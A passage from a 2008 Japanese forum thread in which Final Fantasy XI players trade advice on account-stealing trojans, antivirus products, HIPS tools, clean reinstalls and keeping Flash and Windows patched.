どうにかして速攻でパスを変更してから他の原因を考えろ
595既にその名前は使われています:2008/08/17(日) 14:57:46 ID:jBwu4CfK
>>591
GF8000系はPOLフルスクリーンだとFF11の起動で落ちるってバグがあった気がする。
596既にその名前は使われています:2008/08/17(日) 14:59:04 ID:u+7BYvIL
>>560
vistaユーザなら
ttp://support.microsoft.com/kb/923947/ja 参照
597560:2008/08/17(日) 15:01:04 ID:ndqT0NUw
>>590
リネームは盲点でした。解決することができました。ありがとうございます。
598既にその名前は使われています:2008/08/17(日) 15:03:44 ID:Q/CzFlgR
>>576
>何もしないでアカウントが変更できるのは「ファイナルファンタジー11」だけ

FFだけってのは嘘杉w
現行パスワードで変更できるものはごまんとある。
むしろ確認するもののほうが少ない。

もちろんだからFFは現状でOK!と言ってるわけじゃないから念のため。
599既にその名前は使われています:2008/08/17(日) 15:04:25 ID:78w4B9Oy
>>591
公式の窓化は、たとえ窓化でも他に全画面使うアプリがあったらエラーで落ちることがある
FFよりも他の要因の可能性が高いと思う
600既にその名前は使われています:2008/08/17(日) 15:05:21 ID:4AHbM+5m
パス入力ミスするだけで、ドキドキオンライン
601既にその名前は使われています:2008/08/17(日) 15:07:24 ID:ZNhtwA8S
ルーセントなんちゃらとかいうの認証鯖が逝かれて再認証がどうとか問題になってるみたいだな
何かの釣りなんじゃね?
602男神:2008/08/17(日) 15:08:41 ID:xxzWCewz
やぱパス保存と入力なら その都度入力のが安全なのかな?
603既にその名前は使われています:2008/08/17(日) 15:10:18 ID:JuDLRLHu
>>593
ファイルチェックしてもなにも直すところがなかったです

>>594
Polには一応接続できたのですが心配なので変えておきました

>>592,595,599
他に起動してたのはJaneとフォルダ少し開いている程度でしたがエラーが出ました

スキャンし終わったspybotとを閉じたらなぜかつながりました。
お騒がせしました、ありがとうございました。
604既にその名前は使われています:2008/08/17(日) 15:10:32 ID:ZNhtwA8S
保存は絶対らめぇ
605既にその名前は使われています:2008/08/17(日) 15:12:27 ID:frCT97dE
パスワードを”tenanmon○○○○”とかにしてみるか
606既にその名前は使われています:2008/08/17(日) 15:22:27 ID:y3I8wIMu
自分の場合はIME2008?か2007どっちか忘れましたがそれのエラーで落ちてました
ATOKに変えて治りました
607既にその名前は使われています:2008/08/17(日) 16:36:25 ID:ZQGp5+Xy
>>606
IMEってVistaとなんか競合起こってこの前修正きてなかったっけ?
608既にその名前は使われています:2008/08/17(日) 16:46:45 ID:y3I8wIMu
>>607
自分はXPなのでなんともいえないです・・・
609既にその名前は使われています:2008/08/17(日) 17:21:08 ID:ynw86BdL
>>553はなんのウイルスなんですか?
610既にその名前は使われています:2008/08/17(日) 18:57:44 ID:rnLnuAyF
>>601
公式が混んでるだけ。
ガマニアの認証の仕組みとしてはガマニアのocx(ActiveXコントロール)をIEに食わせて
IEから起動するというクソ実装(アカハック楽チン)なんだが、
ocxからexeに渡されるパスワードをProcessExplorerなどで
ショートカットにコピペしておけば直接起動もできる。
611既にその名前は使われています:2008/08/17(日) 19:15:17 ID:JyGMjVGa
hostsファイルが消えちゃってるんだが
hostsファイルってなくても大丈夫なものなの?
612既にその名前は使われています:2008/08/17(日) 19:17:58 ID:gFmyAFmf
>>611
勝手に消えるはずはない
多分マルウェアに消されたんだろう
テンプレ見てオンラインスキャンしたほうがいい
あと、安全な環境からPOLのパス変更も
613既にその名前は使われています:2008/08/17(日) 19:18:24 ID:rnLnuAyF
>>611
2000でもXPでもデフォルトでhostsはある。
XREAでばら撒かれているトロイ(KarnaeghDrv.dll KernaeghDrv.dll etc)などは
(hostsに危険ホストを書いて阻止する人を乙らせるために)
hostsを削除する機能を持っている。
614既にその名前は使われています:2008/08/17(日) 19:31:26 ID:rnLnuAyF
XREAトロイについて補足すると、事前に全機撃墜したのは
(意外だけど)MicrosoftのOneCare。OneCareはパッケ売りだけど
OneCarePCセーフティってのがタダで使えたはずなのでお試しを。
ttp://onecare.live.com/site/ja-jp/
Kasperskyのスキャンも併用していい
(AntiVirとKasperskyに関しては検体を送って数時間で対応されている)。

OneCareの次点でVBA32(全機撃墜、ただしdllやrootkitは見逃すので
感染後=駆除には使えないし、敷居が高い)。
さらに次点でDr.WEB(最近の数匹見逃し)。
他はどんぐりの背比べ。
615611:2008/08/17(日) 20:54:56 ID:JyGMjVGa
あ、KarnaeghDrv.dllにきされてたのか、、、
セーフモードで完全スキャンとかして駆除はしたんだ
アカは現在凍結中
明日クリーンインストールする予定
hostsファイルはベクターだっけか、そういうとこで配布されてる
マルウェアとかに対応した奴を入れても大丈夫ですか?
616既にその名前は使われています:2008/08/17(日) 21:04:18 ID:rnLnuAyF
デフォのhostsは中身空だよ。
後はお好きに。
617既にその名前は使われています:2008/08/17(日) 21:37:42 ID:VXFtCJaq
こんな間違いをしているのは自分だけだと思うが念のため

@niftyのオンラインスキャン=カスペオンラインスキャンではなかった
@niftyのオンラインスキャンはカスペのウイルスのみのスキャン・駆除・削除、スパイウェアはできないと書いてある

他社と併用するため、@nifty使っていたけどスパイウェアはできないのに気づいた
618既にその名前は使われています:2008/08/17(日) 22:08:35 ID:jlKNaNa3
OneCureのオンラインのやつはタダで使える。
が、ウィルス見つけて除去はしてくれるが詳細は見られない仕様っぽいですね。
619既にその名前は使われています:2008/08/17(日) 22:27:13 ID:r6Gg8rLO
このスレ見てるとノートンとかの大御所は「トロイ感知全然ダメだのぅ」と感じる。
ゲームアカウントハックに対して親身で面倒みてないつか、何のサービスしてるのか
不安になるわ。

来年度版からは糞ノートン(「先生」の称号剥奪!)買うのやめて、カスペル大先生にしようと決心した。
620既にその名前は使われています:2008/08/17(日) 22:36:36 ID:n2ZML/tQ
http://www.atmarkit.co.jp/news/200805/16/kaspersky.html
ちなみにOneCareはカスペと同じもん
俺は扱いやすいOneCareをオススメする
621既にその名前は使われています:2008/08/17(日) 22:38:58 ID:gFmyAFmf
>>619さんの意見はそれはそれで正しいんだけど、去年から
この一連のスレを読んでいればウイルス対策ソフトの種類より、
脆弱性対策パッチの適用とそのための情報収集のほうが
効果的だとわかるはずなのですよ。
FFのアカウントハックに関しては、このスレで十分に情報を
集められるはずです。
622既にその名前は使われています:2008/08/17(日) 22:43:09 ID:D9TNRXLZ
二回アカハックくらうと巻き戻しできないのが痛いな。
623既にその名前は使われています:2008/08/17(日) 22:47:59 ID:rnLnuAyF
>>620
同じじゃないぞ…。
624既にその名前は使われています:2008/08/17(日) 22:51:06 ID:n2ZML/tQ
Windows Live OneCare 2.0
http://kakaku.com/item/03501722054/
1年2580円で3ユーザー

Kaspersky Internet Security 7.0 優待版
http://kakaku.com/item/03505021692/
1年4100円で1ユーザー


検出率は同じ
625既にその名前は使われています:2008/08/17(日) 23:00:22 ID:Pu93EOLn
オンラインスキャンでも自分のソフトでも検索出来なかったんですが
これって感染してないってことかな?
クリーンインストールしなくても大丈夫でしょうか?
626既にその名前は使われています:2008/08/17(日) 23:01:41 ID:aiLyHBoQ
>>624
上はgameシーフ検出しなかったわ・・・
627既にその名前は使われています:2008/08/17(日) 23:03:09 ID:gFmyAFmf
>>625
残念ですが、誰も安全を保証できません。

Wikipedia:悪魔の証明
この項の2
http://ja.wikipedia.org/wiki/%E6%82%AA%E9%AD%94%E3%81%AE%E8%A8%BC%E6%98%8E
628既にその名前は使われています:2008/08/17(日) 23:04:14 ID:mbrclJMc
>>625
ハックされたことがあるかないかで違ってくる
無いのなら今のところ大丈夫なんじゃない?って程度。それでも
太鼓判は押せないけど。
ハックされた上で「ウイルス見つからないけどクリーンインスコいらないよね?」って
言ってるのならグーで殴る
629既にその名前は使われています:2008/08/17(日) 23:15:38 ID:n2ZML/tQ
http://www.virustotal.com/jp/analisis/0a2db5efd99ec9e7bf45d127bdcc4707
これはwzcsvbxm.dllの3個目の検体
発見された時点で国内で販売してるので対応してたのはOneCareだけ
カスペルスキーのエンジンにOEM先の独自のチューニングが施されるから未知のウィルスに対しては大元のカスペとどちらが優れてるとは言えないが平均して同じだろう
630既にその名前は使われています:2008/08/18(月) 00:16:35 ID:PHsjYJFY
>>629
OneCareにKasperskyエンジンは入っていないと何度言ったら…。
鯖向けのForefrontと勘違いしてね?
631既にその名前は使われています:2008/08/18(月) 00:26:02 ID:YLmaj01/
検知力テスト(2008年8月16日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/

Rank Detects Missed Product
1st 97% 95 AntiVir
2nd 96% 106 Webwasher-Gateway
3rd 94% 171 Ikarus
4th 93% 205 BitDefender
5th 92% 251 AVG
6th 92% 252 F-Secure
7th 89% 355 Avast
8th 88% 371 Sophos
9th 88% 373 Norman
10th 85% 472 Kaspersky
11th 85% 475 ClamAV
12th 84% 510 Microsoft

同じもんだというのは最近の検出率が証明しとる
632既にその名前は使われています:2008/08/18(月) 00:34:44 ID:PHsjYJFY
だめだこりゃ
633既にその名前は使われています:2008/08/18(月) 00:35:14 ID:YLmaj01/
MS、Forefrontセキュリティ製品ラインを5000万ドルでテコ入れ
http://www.itmedia.co.jp/enterprise/articles/0707/13/news012.html
「Forefront Client Security」は、OneCareと同じアンチウイルス/アンチスパイウェア技術をベースにしている。

最近になってカスペにエンジンが変わった
634既にその名前は使われています:2008/08/18(月) 00:35:46 ID:Ev36gbZN
>>632
お前が馬鹿(笑)
635既にその名前は使われています:2008/08/18(月) 00:38:05 ID:YLmaj01/
http://www.sofmap.com/product_detail/exec/_/sku=10831367/-/gid=SW03010000
「Windows Live OneCare 2.0」には、マイクロソフトのビジネス向けセキュリティソリューション製品であるMicrosoft Forefrontと同じウィルス検出エンジンを使用することで、検出性能をより一層向上しています。また、1本で3台までのPCにインストールすることが可能な上、
ホームネットワーク内のコンピュータを一括管理するOneCareサークルは最大3台までのPCを管理できます。
636既にその名前は使われています:2008/08/18(月) 00:40:33 ID:bIAZujdk
ID変えて必死なのがいるようですねえ
637既にその名前は使われています:2008/08/18(月) 00:43:00 ID:Ev36gbZN
>>636
お前のことか(笑)(笑)
638既にその名前は使われています:2008/08/18(月) 00:45:25 ID:4I13vvd5
そんなにあおり愛しなくてもいいじゃないか!
みんなで自衛してるわけだし争う理由はないと思うんだ
639既にその名前は使われています:2008/08/18(月) 00:49:10 ID:YLmaj01/
Forefrontは企業向けのブランドで自分の好きなメーカーのエンジンを選べるから検出ランキングで使われる事は無いよ
MSはもう自社エンジン諦めた
640既にその名前は使われています:2008/08/18(月) 00:50:21 ID:dFbgkzOG
とりあえずまだ続けるつもりならセキュ板あたりに場所移しておくれ
641既にその名前は使われています:2008/08/18(月) 00:54:04 ID:Ev36gbZN
>>640
負け惜しみか(笑)(笑)(笑)
642既にその名前は使われています:2008/08/18(月) 00:56:34 ID:YLmaj01/
http://gdata.co.jp/press/archives/2008/08/9g_data.htm
●7月の検出率順位 製品名 検出率
01位 G DATA アンチウイルス2008         99.47%
02位 Norton アンチウイルス2008         99.21%
03位 Kaspersky アンチウイルス7.0        98.64%
04位 Windows ライブ ワンケア          98.23%
05位 F-Secure インターネットセキュリティ 2008 97.92%

上位5位の中でNorton以外はカスペエンジン
この中でNorton以外の安いの選ぶのが良い
643既にその名前は使われています:2008/08/18(月) 00:57:29 ID:4I13vvd5
いつもの変なのだから気にしちゃだめですよ?
644既にその名前は使われています:2008/08/18(月) 01:01:02 ID:PHsjYJFY
OneCareスレでもデマ広めてたよ
645既にその名前は使われています:2008/08/18(月) 01:02:42 ID:Bq6/IcfA
OneCareVersion2.5からはカスペエンジンだぞ
646既にその名前は使われています:2008/08/18(月) 01:07:18 ID:YLmaj01/
G DATAはAvastとカスペ両方のエンジン組み合わせてるから糞重い
F-Secureは企業でよく配られてるから使ってる人も多いと思う
F-Secureからカスペに乗り換えようなんてことは考えるなよw
647既にその名前は使われています:2008/08/18(月) 01:16:58 ID:YLmaj01/
>>645
2.0からだろ
去年の年末に一気にカスペに並んだからな
648既にその名前は使われています:2008/08/18(月) 01:18:51 ID:ca4DKyBB
必死=暇つぶしだから相手しないよーにー

順位が高い=最強でもないから、皆勘違いしないよーにー
(てか、PCの状況によってはこの順位すらコロコロ変わるから、信頼度は無い)

ってか、最強厨の語りなんて日常茶飯事だろこの板じゃ。
649既にその名前は使われています:2008/08/18(月) 01:21:03 ID:PHsjYJFY
650既にその名前は使われています:2008/08/18(月) 01:22:02 ID:LPXAzHU0
>>649
パス抜かれた;;
651既にその名前は使われています:2008/08/18(月) 01:23:02 ID:/u/ZFoEv
またウィルスソフトでなんたらかんたらですか
このスレは感染したらクリーンインストール推奨なんだから
ウィルスソフトなんてなに入れてても同じでしょうに
感染しない状況を自分で考えない限り感染はするんだから・・・w
652既にその名前は使われています:2008/08/18(月) 01:24:58 ID:7nFPeQGy
業者があおってんじゃね?
653既にその名前は使われています:2008/08/18(月) 01:32:07 ID:PHsjYJFY
>>651
アカハックに投入されるスクリプトを見ている限りは
MicrosoftUpdateとFlashPlayerの更新だけで9割以上(脳内統計)は減る気がする。
654既にその名前は使われています:2008/08/18(月) 02:00:27 ID:j5eu0YWp
ウィルスソフトって、感染しにくくする”ワクチン”であって、
罹病してからの”治療薬”って考えは、ちょっとまずい、と思うんだ……

で、クリーンインストールって、推奨もナニも、ネットワーク管理からみたら、
クライアントとしてウィルスにかかったら最低限やってもらわないと困ることの一つなんだけど……

ネットワークの安全はクライアントの協力あって成り立つことです。
だから、いつも完全にきれいなPCで接続してくれないと困んだけどなぁ。
655既にその名前は使われています:2008/08/18(月) 02:06:35 ID:/u/ZFoEv
>>654
感染「しにくくする」という認識は間違ってますよ
感染は、いまあるウィルス対策ソフトのどれを入れてもするんです
ワクチンとは、入ってきたウィルスを殺すためのものであり
感染を事前に防ぐものではありません
656既にその名前は使われています:2008/08/18(月) 02:13:54 ID:P1PnbBZl
>>654
大体同意
でもなんでそんな上からの目線なの?

>>655
備えっていみでないの?
657既にその名前は使われています:2008/08/18(月) 02:16:55 ID:g4q68L1o
所で、あまり詳しくないんだが
wzcsvbxm.dllとかdllってのはダイレクトライブラリだっけ?
これはウイルス本体が参照する辞書のようなもので消しても、一時的に
ウイルスが起動できなくなるだけで本体は無事なんだよね
疑問なんだが、これらのdllを使ってるウイルス本体って判明してないの?
よくdll見つかったら消してもダメなのでクリーンインストールって聞くけど
本体ってなんとかして見つけれないものかな?
658既にその名前は使われています:2008/08/18(月) 02:24:33 ID:6HmPxpcb
>>656
上から目線ではないような気がするが

>>657
dllだからクリーンインスコするわけじゃないぞ?ウイルスは大体レジ改竄したりするからな
一般の人間に通常のレジと書き換え後がわかるわけも無く、またレジをいじって直すのは非常に面倒

結果、クリリンが一番早くて楽なだけだ
659既にその名前は使われています:2008/08/18(月) 02:26:00 ID:HFFiyTj5
>>657
それを見つけて各方面に検体提出したのがここのスレなんだけど、PC内で見つけた人が
dll自体を削除しても復活してしまうとか言ってたねー。

でもウェブページ上にjsで仕込まれてるウイルスの方も検体出してくれてる人いたよね?
660既にその名前は使われています:2008/08/18(月) 02:26:29 ID:g4q68L1o
するとレジストリが変更されたら知らせるようなソフトがあると
ウイルスに気付いたりできるのかな
661既にその名前は使われています:2008/08/18(月) 02:26:35 ID:/u/ZFoEv
>>656
「感染しない」とか「感染しにくい」という認識がウィルス対策ソフトに
あるから、ウィルス対策ソフトさえ入れておけば大丈夫だと思っている
人が多すぎなんですよね
たとえば「風邪予防のマスク」みたいにウィルス対策ソフトを考えている
人って結構多いですよ

PCにウィルスが入ってくることを防止するソフト(未知のものは別ですけど)は
通信を監視してればできるはずなのに、まだそういうソフトってないですよね
まぁ、ネット環境がものすごく重くなるから使い物にはならないだろうけど
662既にその名前は使われています:2008/08/18(月) 02:28:11 ID:/u/ZFoEv
>>660
それがHIPSといわれるソフトです
663既にその名前は使われています:2008/08/18(月) 02:28:25 ID:6HmPxpcb
>>660
とっくにあるがな、そしてスレ違い
664既にその名前は使われています:2008/08/18(月) 02:28:30 ID:HFFiyTj5
>>660
spybotの付属のやつを使った人がいたと思うけど、レジストリ変更自体は
物凄く頻繁に起こってるらしいから、許可ばっかり連打してるうちに肝心の
ウイルスによる改竄を見逃してしまいそうとか言ってた気がする
665既にその名前は使われています:2008/08/18(月) 02:30:25 ID:/u/ZFoEv
>>663
すれちではないですよ
ここのテンプレにもありますし
666既にその名前は使われています:2008/08/18(月) 02:35:14 ID:fpEqPXPi
>>659
wzcsvbxm.dllの分離が行われたシステムで、wzcsvbxm.dllが再度復活してたって報告は記憶にないなー。
wzcsvbxm.dllがサービスとして常駐していた場合に、レジストリを修正してもその常駐しているwzcsvbxm.dllがレジストリを書き戻しにくるってことw
それと悪さするやつはこいつだったとしても、こいつを生成したドロッパが特定できてなかったからね。
ドロッパがPC内に残っている可能性もあったわけだし、クリンスコしちゃったほうが確実だねってことでクリンスコしれって言ってたのよw
667既にその名前は使われています:2008/08/18(月) 02:40:59 ID:YcSMqfAI
復元作業は1ヶ月以上かかるみたいですね。
当初、混み合っているので2週間はかかる と言われたんですけど
被害者が増えているんでしょうかね・・。
668既にその名前は使われています:2008/08/18(月) 03:08:48 ID:PHsjYJFY
>>657
いや、うーん、それがトロイ本体。
トロイがトロイを産み落とすとか言うと頭がおかしくなって死ぬので
産み落とす親のことをドロッパとも言う。

ドロッパの役割はトロイを(自身から切り離すかネットから拾ってくるなどして)
適切な場所(system32など)に配置し、レジストリに書いて常駐させること。
物によってはトロイが消されたらまた配置すること。
669既にその名前は使われています:2008/08/18(月) 03:11:43 ID:/u/ZFoEv
HIPSに関してちょっと書いておきます

Spybot附属のTeaTimerは比較的監視は甘めですね
それほど頻繁に許可・不許可を聞いてきません
これは本体の設定が推奨レベルの設定だからかも知れませんけど

なにかあると必ず聞いてくるのがUnleakです
設定はデフォルトに近い形で使っていますが、しばらく自分の環境を
学習させないと作業に支障が出るくらい聞いてきます

Windows defenderにもHIPS機能があるようですね
こちらは、なにがシステムの変更を行おうとしているのかの通知が甘いです
(Vista標準装備でしたっけ?)

このみっつを同時に入れてシステム監視させていますが、Unleakを入れた
環境でSpybotの全サーチをさせると、レジストリ関連の検索結果で動作不全が
出てくるようで、テンプレには複数入れるのはおすすめではないと書きました
670既にその名前は使われています:2008/08/18(月) 04:26:44 ID:XTsvNOqh
以前誤売却や誤破棄したアイテムの復旧サービスを受けたことあるんだけど、ハック受けた場合の復旧とは別物?
あれも1回きりのようだが共通だったらやだな・・・
671既にその名前は使われています:2008/08/18(月) 06:00:40 ID:Xm9tE+xv
アイテム復旧救済とハック復旧救済を
どうやったら同じサービスだって考えるに至ったかをまず知りたい
672既にその名前は使われています:2008/08/18(月) 06:22:59 ID:4b4/lVV7
おまいら喧嘩すんな
ウィルスバスター(2008)使いだが感染してないぞ。
因みにVistaなんでPeerGuardian2も導入してない。(出来るらしいけど分かりづらかったんでやめた)

ただ、ここでアップデートの報告上がるより先にフラッシュのVUしてたり
垢ハク騒ぎの始まった去年の秋からIEやIE系の専ブラは使わず、基本もjavascriptも切り、
と当たり前な事だけれど基本的な事を早くからしてた、ってのあるけど
673既にその名前は使われています:2008/08/18(月) 06:39:37 ID:QQpV5Nsf
>>672
VB2008だけどフラッシュ古かったせいでハックされたぞ?
VB2008は検出できてないから、他のにかえないと死亡
674既にその名前は使われています:2008/08/18(月) 06:40:31 ID:2HrM8Jck
後半も読んでやれよ
675既にその名前は使われています:2008/08/18(月) 06:48:57 ID:QQpV5Nsf
>>674

全部よんだ上でVBは危険だっておしえてんの。
フラッシュプレイヤーを最新にしたからVBだけど運良く一歩手前で安全だったんだよ ってな。
676既にその名前は使われています:2008/08/18(月) 07:02:21 ID:UoKrm1r4
セキュリティは、責任者が安心した時点で劣化する
セキュリティを破ろうとする者は努力や変化を忘れない
677既にその名前は使われています:2008/08/18(月) 07:03:57 ID:2HrM8Jck
Flash最新じゃなかったのはVBのせいですか
そこはセキュリティサイト購読するなり
SecuniaいれるなりHIPS入れるなりししてくださいよ

ウィルスソフト一本で安全安心なんて思ってるからやられるんでしょ
678既にその名前は使われています:2008/08/18(月) 07:07:05 ID:bwCOGLhh
俺もVBだけどハックはされてないよ。
今後はどうなるか知らんけど。
679既にその名前は使われています:2008/08/18(月) 07:36:18 ID:gF5Ub0PO
質問なんだけど、
カスペルスキーって2垢、3垢用のパックって売ってるかな?
680既にその名前は使われています:2008/08/18(月) 08:21:58 ID:FfpHnx3h
>>679
売ってるよ。
681既にその名前は使われています:2008/08/18(月) 08:50:51 ID:gF5Ub0PO
dクス
682既にその名前は使われています:2008/08/18(月) 11:25:15 ID:e9jIEgRL
PCのことはよく分からないんだけど
ブログ記事を投稿した瞬間に突然FFXIに全く関係ない宗教サイトみたいなのの宣伝コメみたいのをされ、携帯からURLへ飛んでみたら、とりあえずはRMTとか業者とは関係ない普通っぽいサイト(まぁ、怪しげな宗教サイトですがw)でしたが…
今やあからさまなFFXI系の宣伝URLってのは警戒されて誰も踏まないので、こういった全然関係なさそうなとこにもウィルスを仕掛けてる場合もあるんじゃないかな?とおもって、書き込みしてみました。

実際そこに罠組み込まれてるのかどうかは自分では分からないんだけど、URLのっけたほうがいいですか?
683既にその名前は使われています:2008/08/18(月) 11:53:16 ID:PHsjYJFY
>>682
自分で黒判定できないならまず >>68
684既にその名前は使われています:2008/08/18(月) 12:24:54 ID:nH8boAmY
ネトゲはやったことないんだけど、XREAのFlashウイルス騒ぎ以降PG2を導入した者です。

で、シャットダウンに時間がかかるのって、PG2のせいということはない?
自分も時間かかるようになってしまって、
だけど試しにPG2を終了させてからWindowsをシャットダウンするようにすると
大丈夫みたいなんだけど…

バージョンはPeerGuardian 2.0 Beta 6bです。
685既にその名前は使われています:2008/08/18(月) 12:28:23 ID:9p44RDkJ
まずカスペのスキャンとかしてウィルスないのを確認したほうがよくないか?
pg2でシャットダウンが気になるほど遅くなったって報告は見ないしね
あとは>>1読んで欲しい
686既にその名前は使われています:2008/08/18(月) 12:35:58 ID:sYYUh+7Z
シャットダウンも遅くなるけど、電源オプションを開く時に時間がかかる ってのもなかったっけか
687既にその名前は使われています:2008/08/18(月) 12:40:11 ID:DFGjVuue
>>684
PG2を入れると環境によってはシャットダウンに時間がかかることがある
これは既出の問題でまったく症状の出ない人もいる
同一の状態のPCにおいて直ちにシャットダウンすることもあればそうでないことも

>>685
それはあなたが知らないだけ

今回の一連のトロイの場合は、終了のダイアログを出すこと自体にも時間がかかり
その後に電源を切るを選択した後も時間がかかるというものです

上記の症状とは別です
688既にその名前は使われています:2008/08/18(月) 12:48:52 ID:+PRaNhzF
ブルーバックの青じゃなくてデスクトップの青のままシャットダウンが完了しない
ファンはまだ動いてる、ディスクアクセスランプは消えてる
そのまま電源ボタンで消してるんだけどこれってアウト?
689既にその名前は使われています:2008/08/18(月) 12:50:25 ID:Ey6E/LQp
pg2 シャットダウンでググれば似た記事が見つかるぜ
俺は電源きるときや再起動する時は必ずPG2を手動で終了させてからやる
100%PG2のせいとは言い切れないから不安ならクリンインスコしる
690既にその名前は使われています:2008/08/18(月) 12:58:18 ID:+PRaNhzF
PG2はシャットダウン前に切ってる。
シャットダウンの前にインターネットの接続を切り、
その他タスクトレイにあるもので右クリックだけで終了できるものはすべて終了
(アンチウィルスソフトは終了させられなくて放置)

毎回シャットダウン失敗するわけでもないけど、よく失敗するんだ
691既にその名前は使われています:2008/08/18(月) 14:02:56 ID:oYbdQtaB
PC環境次第でしょ
うちはPG2入ってるがシャットダウン遅くもなってないし、
失敗すること無いしね。
692既にその名前は使われています:2008/08/18(月) 14:17:37 ID:gcf0YIvj
私がハッキングされたPCで体験したシャットダウンに時間がかかるってのは

スタートメニューから終了オプションを選ぶと「コンピュータの電源を切る」っていう小窓が
出てくるのに5分近くかかった。

だからシャットダウンに時間がかかるって訳じゃなく、シャットダウンさせたいのにそれを指示するのに
時間がかかったって感じかなー。
693692:2008/08/18(月) 14:25:08 ID:gcf0YIvj
↑はwzcsvbxm.dllタイプです。Karnaegh.dllとか他のは分かりません。
694既にその名前は使われています:2008/08/18(月) 14:27:44 ID:sYYUh+7Z
復旧メール届いたが、まだしばらく性感しとこう
695既にその名前は使われています:2008/08/18(月) 14:39:43 ID:jwNn5lzR
>>631
もしかしてカスペって糞?
オススメのアンチウイルスソフト教えてください!
696既にその名前は使われています:2008/08/18(月) 14:47:22 ID:0vA1jfm8
>>672
感染したかしないかじゃなくて検知するかしないかなんだけどね
697既にその名前は使われています:2008/08/18(月) 14:48:02 ID:zkqvXg7f
ちょくちょく登場する検出率リストって何なの?

重要なのは、"クリティカルなウィルスの"検出率であって、
"とりあえずの"検出率なんて意味ないと思うんだが
698既にその名前は使われています:2008/08/18(月) 14:50:31 ID:HFFiyTj5
>>697
セキュ板からの出張さんです
699既にその名前は使われています:2008/08/18(月) 15:00:01 ID://4ed18n
>>697
それを踏まえての検出率だと思うんだ
700既にその名前は使われています:2008/08/18(月) 15:17:00 ID:j5eu0YWp
>>697
いまどきでも山田オルタでネ実にスレが立つんだぜ?

既存のマルチウェア対応に注意を払うのは当然だと思うけど。
701既にその名前は使われています:2008/08/18(月) 17:39:26 ID:4WfAUwre
8月のマイクロソフトセキュリティ更新を確認する
http://internet.watch.impress.co.jp/cda/special/2008/08/18/20576.html
702既にその名前は使われています:2008/08/18(月) 17:47:06 ID:qm6+CLPl
「Windows Update」のエラー報告が急増中,原因はウイルス
http://itpro.nikkeibp.co.jp/article/NEWS/20080814/312758/

他でも被害でてるみたいだ
703既にその名前は使われています:2008/08/18(月) 17:57:00 ID:E/GrkO28
重要なのは「感染しないこと」です
704既にその名前は使われています:2008/08/18(月) 18:20:48 ID:E/GrkO28
その次に重要なのは感染しても発症させないことです
705既にその名前は使われています:2008/08/18(月) 18:29:03 ID:zkqvXg7f
その次に重要なのは、発症しても広めないことかな
706既にその名前は使われています:2008/08/18(月) 18:33:20 ID:RI751Yv7
>>705
例えばこんな風に感染の恐れのあるサイトを何の工夫無く張る事かな?

「ファイナルファンタジーXI プレイヤーズコレクション」第1弾販売開始!(2008/08/18)
ttp://www.playonline.com/ff11/topics/special/080818.html
感染力:低
症状:垢ハック受けてヅタボロのハズが課金を続け更に余計なお布施をしてしまう。
707既にその名前は使われています:2008/08/18(月) 18:43:43 ID:E/GrkO28
重要度
 1.ウィルスに感染しない
 2.感染しても発症させない
 3.発症しても広めない←バスター系ソフトの順位はこの位置です
708既にその名前は使われています:2008/08/18(月) 18:46:35 ID:2gOglTHW
現実的には感染=発症と考えるべきだが

@マルウェアをPCに入れない
AマルウェアをPCに入れても実行させない
============セキュリティの壁============
Bマルウェアを実行しても感染させない
Cマルウェアに感染しても発症させない

感染…システムの汚染(PC起動時に自動的に実行されるようになる)
発症…有害な動作(ファイル流出、自動投稿、IDパス抜き、遠隔操作、他PCへの感染、等々)
709既にその名前は使われています:2008/08/18(月) 18:51:17 ID:E/GrkO28
>>708
レジストリを書き換えないマルウェアがあれば感染=発症ですね
レジストリを書き換えにくるマルウェアはHIPSで発症は抑えられます
710既にその名前は使われています:2008/08/18(月) 19:44:07 ID:E/GrkO28
ちょっと言葉足らずでしたけど、HIPSが受け持つセキュリティ対策方法は
「AマルウェアをPCに入れても実行させない」の部分です
正確には「マルウェアがPCに入ってきたときに(=感染したときに)レジストリへの
登録を阻止して実行を不許可にする(=発症させない)」でしょうか

ただ、それをソフトが自動には識別してくれないので、レジストリへの登録の
許可・不許可の判断はPCを使っている人がしないといけませんけど
自動実行登録はなにか新しくソフトを入れたときくらいにしか聞いてこないので
それ以外の場面で聞いてくるようならウィルスを疑っていいと思いますし
不明な場合は検索してみると意外と答えが見つかったりします

まぁ、HIPSを入れてても100%安全だとは言えませんけどね
偶然が重なって、なにか新しいソフトを入れているときにたまたまマルウェアの
実行登録を聞かれて許可してしまった、なんてこともありえる話かもしれません
711既にその名前は使われています:2008/08/18(月) 20:03:59 ID:2fCI11sH
HIPSの機能はAとBにまたがってると思うが

未登録のプログラムが実行されるのを防ぐ機能がA
実行されたプログラムによるレジストリ書き換えを阻止する機能がB

正直、内部の書き換えが頻繁なネトゲPCにHIPSは向いてないと思う
役立たずのユルユル設定になるか、警告出すぎてゲームにならないのがオチ
712既にその名前は使われています:2008/08/18(月) 20:07:51 ID:Ympre9pR
垢ハック被害にあったフレの話とか聞くと、「FF11アルザビ裏技.avi .exe」とか
平気で踏んじゃってるセキュリティ云々以前の問題というレベルから、スクリプトによるブラウザ経由の
感染まで色々あるけど、大抵は火狐とNoscriptや適切なFW、無料のウイルス対策ソフトなんかだけで、
万が一の事故も防げていたレベルが多いんだよな、そもそもハックされるまでアカウントという大事な物を
PCに入れているという自覚すらない、財産入った金庫の鍵あけて軒先に吊しておくレベル

このスレで個別のFWの話題ってあんまり出ないけど、みんなソフトウェアFWはあまり使ってないのかな
俺はPC Tools Firewall Plus愛用者、無料だし日本語にも対応してるし作動も軽い、以前使ってたZAみたく
通信忙しい状態で長時間使うと何故か強制終了して、当たり前の事のように自動でサービス再起動する
とかも無く、オンラインで通信続いたまま1週間でも動いてくれるのが有り難い、少数派ですかそうですか
713既にその名前は使われています:2008/08/18(月) 20:14:44 ID:48KJM+0M
平和な日本なら仮に財産入った金庫の鍵あけて軒先に吊しておいても盗まれないかもしれないが
ネットには国と言う垣根がないからな
714既にその名前は使われています:2008/08/18(月) 20:41:54 ID:xV87syxr
ハック受けた後、プレイオンラインビューアー起動するのに時間かかるようになった気がする・・
気のせいならいいけど・・・。またされたら終わりだ・・・orz
715既にその名前は使われています:2008/08/18(月) 20:45:46 ID:8bWRsi68
>>714
そんなこと言ってるとまじにうけっぞw
ちゃんと対策しようぜw
716既にその名前は使われています:2008/08/18(月) 20:49:47 ID:vec6Yysd
>>712
PFWもHIPSと同様、ネトゲPCで上手く操るのは難しいからな、レスポンスも悪化するし
>>713
隠れて金庫を見張ってる奴がいるかもしれないから日本人は手を出さないが、
